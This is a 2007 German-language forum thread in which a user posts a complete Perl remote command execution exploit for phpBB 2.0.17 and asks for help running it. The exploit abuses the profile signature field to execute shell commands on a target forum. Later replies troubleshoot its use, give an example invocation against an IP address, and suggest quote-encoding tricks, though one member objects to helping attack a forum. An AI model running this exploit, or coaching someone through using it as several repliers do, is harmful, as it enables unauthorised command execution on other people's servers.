Hilfe bei Exploit mit Perl

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von BasHx, 9. Juli 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 9. Juli 2007
    huhu zuerst einmal mein problem ich hab n exploit von ner seite

    Code:
    #!/usr/bin/perl

# phpBB <= 2.0.17 remote command execution exploit
# need for work: 
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05

use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 2) { usage(); }

head();

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
 {
 $rand .= int(rand(9)); 
 }

$name = 'r57phpBB2017xpl'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
 $path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

 Content => [ 
 'username' => $name,
 'email' => $rand.'[email protected]',
 'new_password' => $password,
 'password_confirm' => $password,
 'signature' => 'r57:`'.$cmd.'`',
 'viewemail' => '0',
 'hideonline' => '1',
 'notifyreply' => '0',
 'notifypm' => '0',
 'popup_pm' => '0',
 'attachsig' => '0',
 'allowbbcode' => '1',
 'allowhtml' => '1',
 'allowsmilies' => '0',
 'mode' => 'register',
 'agreed' => 'true',
 'coppa' => '0',
 'submit' => 'Submit',
 ],
 );

if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }

$res = $xpl->post(
 $path.'login.php',
 Content => [
 'username' => $name,
 'password' => $password,
 'redirect' => '',
 'login' => 'Log in',
 ],Referer => $path.'login.php');

$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
for(@content)
 {
 if(/<\/textarea>/) { $p = 0; }
 print $_."\r\n" if $p;
 if(/<textarea name="signature"/){ $p = 1; }
 }
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

sub head()
 {
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n"; 
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 }
 
sub usage()
 {
 head();
 print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
 print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
 print " <cmd> - Command for execute\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 exit();
 }

# milw0rm.com [2005-12-24]
    wenn ich jetzt

    cd desktop
    und dann beispiel.pl eingebe komm ich in so n menü
    wenn ich path angebe bekomm ich zuerst nix dann geb ich nochmal ein und bekomme einen Syntaxfehler.

    woran liegt das ?!
     

  3. Heute Deals & Sale mit stark reduzierten Preisen: Jetzt alle ⚡ Angebote finden.


  4. #2 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    "so nen Syntaxfehler" ist nicht sehr aussagekräftig

    //edit habs mal getestet

    {bild-down: http://img258.imageshack.us/img258/3074/82988499gp6.jpg}
     
  5. #3 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    haste auch ein perl Interpreter installiert ? z.b. activeperl
     
  6. #4 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    ja hab activeperl..
    hm bei mir funkt das iwie nich
    ich mach z.B path xxx
    dann gibt der mir n Syntaxfehler an
    muss ich die ip eingeben oder die url ?
     
  7. #5 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Schreib uns doch einfach mal wie die Ausgabe aussieht, oder mach am besten nen Screenshot

    Ach und bitte mach den Link raus ... sonst kommt das wie ein scheiß hack request rüber, und btw. hab ich kein Bock dir dabei zu helfen irgend ein Forum anzugreifen....
     
  8. #6 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    bei mir sieht das iwie anders aus.. btw hab windoof -.-
    was muss ich den genau eingeben wenn ich path xxx eingebe kommt nix mehr .. dann kann ich nur nochwas eingeben..wenn ich dann cmd eintippe kommt iwie befehl nich gefunden oder so
     
  9. #7 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Wenn du einfach so nett wärst und die KOMPLETTE Ausgabe posten würdest, kann doch nicht so schwer sein . Wenn du sagst es ist ein Syntax Fehler hat es was mit dem Script zu tun, und um das zu analysieren benötigt man eben den Fehler .

    Btw, sollte egal sein welches Betriebsystem
     
  10. #8 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    ahso ok^^ mom kommt gleich #

    e/
    Download offline!
     
  11. #9 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Also so wie ich das sehe liegt der Fehler nicht am Exploit selbst ( es hat nichmal eine Ausgabe für Syntax Error) sondern entweder an deinem Interpreter (ActivePerl) oder du hast das Exploit falsch / nicht vollständig kopiert

    Einfach nochmals probieren mit ner neuen Datei
     
  12. #10 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Du hast den Befehl falsch eingegeben !

    richtig wäre:

    beispiel.pl "IP-Adresse mit /Pfad des entsprechenden spaces" "kommando"

    also z.B.

    beispiel.pl 91.54.43.46/phpbb/ ls
     
  13. #11 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    danke brainstorm ich versuchs ma
    but . wie bekomm ich die ip vom forum heraus ?

    e/
    okay bis jetzt läuft alles gut.. hab user blabla registred aber der user funkt nicht ? btw password und username

    so siehts jetzt aus
    Download offline!
     
  14. #12 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    dachte das sei per default on - naja musste halt mit ' aka %27 alias %2527 rumspielen
     
  15. #13 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    hä wie meinste das jetzt ?
     
  16. #14 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Vergiss das Exploit. Die PHPBB-Version ist neuer als die fuer das Exploit...
     
  17. #15 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    kk ich close hier ma..
     

  18. Videos zum Thema
    Video Script
Die Seite wird geladen...

Ähnliche Themen mit den Stichworten: Exploit Perl

  1. raid-rush
    Exploit: Chrome Browser durch Sicherhetislücke angreifbar
    raid-rush, 7. März 2019 , im Forum: Sicherheit & Datenschutz
    Antworten:
    0
    Aufrufe:
    3.523
    raid-rush
    7. März 2019
  2. THC-9
    Biete Eplus Internetdrossel Exploit
    THC-9, 2. November 2015 , im Forum: Kleinanzeigen
    Antworten:
    6
    Aufrufe:
    1.357
    pattich
    29. März 2020
  3. Carla Columna
    Linux kritische Sicherheitslücke: Kernel-Root-Exploit in 2.6.31 bis 3.15
    Carla Columna, 12. Mai 2014 , im Forum: User News
    Antworten:
    2
    Aufrufe:
    682
    raid-rush
    15. Mai 2014
  4. rushzero
    [V-TuT]Perl Programme(Exploits) starten
    rushzero, 13. Juli 2007 , im Forum: Security Tutorials
    Antworten:
    0
    Aufrufe:
    2.306
    rushzero
    13. Juli 2007
  5. tobigiger
    Perl Exploit
    tobigiger, 22. Februar 2006 , im Forum: Programmierung & Entwicklung
    Antworten:
    2
    Aufrufe:
    365
    joerg
    22. Februar 2006